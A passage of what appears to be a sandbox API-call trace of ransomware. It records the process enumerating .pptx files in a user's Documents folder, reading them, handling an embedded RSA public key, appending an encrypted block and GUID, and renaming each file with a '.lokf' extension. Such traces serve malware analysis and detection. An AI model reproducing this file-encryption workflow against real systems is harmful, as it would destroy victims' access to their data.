nFileSizeLow=0x15810, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FC-e.pptx", cAlternateFileName="FC-E~1.PPT")) returned 1 [0060.305] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.305] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xee) returned 0x329e1f0 [0060.305] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\mw2tK3t ch7R6yApjv\\FC-e.pptx") returned=".pptx" [0060.305] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\mw2tK3t ch7R6yApjv\\FC-e.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\mw2tk3t ch7r6yapjv\\fc-e.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.305] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=88080) returned 1 [0060.305] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.308] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x157ea, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.308] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.309] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x15810, lpOverlapped=0x0) returned 1 [0060.309] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.309] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.309] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.309] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8720) returned 1 [0060.310] CryptCreateHash (in: hProv=0x6b8720, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.310] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.310] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.310] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.310] GetLastError () returned 0x0 [0060.310] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.310] CryptReleaseContext (hProv=0x6b8720, dwFlags=0x0) returned 1 [0060.310] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.310] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.310] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.311] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0060.311] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x15810, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.311] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f800*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f800*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.312] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.312] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.312] CloseHandle (hObject=0x5cc) returned 1 [0060.313] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290398 [0060.313] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 0x3268798 [0060.313] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\mw2tK3t ch7R6yApjv\\FC-e.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\mw2tk3t ch7r6yapjv\\fc-e.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\mw2tK3t ch7R6yApjv\\FC-e.pptx.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\mw2tk3t ch7r6yapjv\\fc-e.pptx.lokf")) returned 1 [0060.314] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4db940c0, ftCreationTime.dwHighDateTime=0x1d4d18c, ftLastAccessTime.dwLowDateTime=0x3a0c1380, ftLastAccessTime.dwHighDateTime=0x1d4d363, ftLastWriteTime.dwLowDateTime=0x3a0c1380, ftLastWriteTime.dwHighDateTime=0x1d4d363, nFileSizeHigh=0x0, nFileSizeLow=0x536, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pzfb-2YEs.pptx", cAlternateFileName="PZFB-2~1.PPT")) returned 1 [0060.314] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.314] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xee) returned 0x329e1f0 [0060.314] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\mw2tK3t ch7R6yApjv\\Pzfb-2YEs.pptx") returned=".pptx" [0060.314] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\mw2tK3t ch7R6yApjv\\Pzfb-2YEs.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\mw2tk3t ch7r6yapjv\\pzfb-2yes.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.314] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=1334) returned 1 [0060.314] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.317] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x510, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.317] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.318] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.318] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.318] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.318] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x536, lpOverlapped=0x0) returned 1 [0060.318] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.318] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.318] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.318] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.318] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8720) returned 1 [0060.319] CryptCreateHash (in: hProv=0x6b8720, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.319] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.319] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.319] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.319] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.319] GetLastError () returned 0x0 [0060.319] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.319] CryptReleaseContext (hProv=0x6b8720, dwFlags=0x0) returned 1 [0060.319] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.319] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.319] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.319] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.319] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.319] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.319] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.319] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x540) returned 0x32947b0 [0060.319] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0060.319] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.319] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0060.319] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.319] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0060.319] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0060.319] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c89058 [0060.320] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85cc8 [0060.320] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c890a0 [0060.320] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85ce0 [0060.320] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85d10 [0060.320] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0060.320] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85d28 [0060.320] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0060.320] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0060.320] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.320] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0060.320] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85d10 | out: hHeap=0x660000) returned 1 [0060.320] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85d28 | out: hHeap=0x660000) returned 1 [0060.320] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.320] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0060.320] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0060.320] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0060.320] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f60 [0060.320] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85d28 [0060.320] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0060.320] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c85d10 [0060.320] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f30 [0060.320] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0060.320] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0060.320] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0060.320] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0060.320] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0060.320] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242348 [0060.320] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0060.320] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.320] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85d28 | out: hHeap=0x660000) returned 1 [0060.320] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.320] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85d10 | out: hHeap=0x660000) returned 1 [0060.320] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0060.320] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.321] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.321] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.321] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0060.321] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.321] GetCurrentThreadId () returned 0x9e0 [0060.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0060.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c8a520 [0060.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0060.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8720 [0060.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0060.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0060.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0060.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.321] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.321] GetCurrentThreadId () returned 0x9e0 [0060.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.321] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e2e8 [0060.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.321] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.321] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.321] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e2e8 | out: hHeap=0x660000) returned 1 [0060.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0060.321] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0060.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0060.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0060.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0060.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0060.321] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0060.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0060.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0060.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0060.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0060.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0060.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0060.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0060.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85d10 [0060.322] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0060.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0060.322] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0060.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0060.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0060.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0060.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0060.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85d28 [0060.322] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0060.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0060.322] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0060.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85cf8 [0060.322] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0060.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85770 [0060.322] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0060.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f70 [0060.322] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0060.322] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0060.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857e8 [0060.322] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0060.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85d40 [0060.322] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857b8 [0060.322] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857e8 | out: hHeap=0x660000) returned 1 [0060.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0060.322] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0060.322] HeapFree (in: hHeap=0x660000, 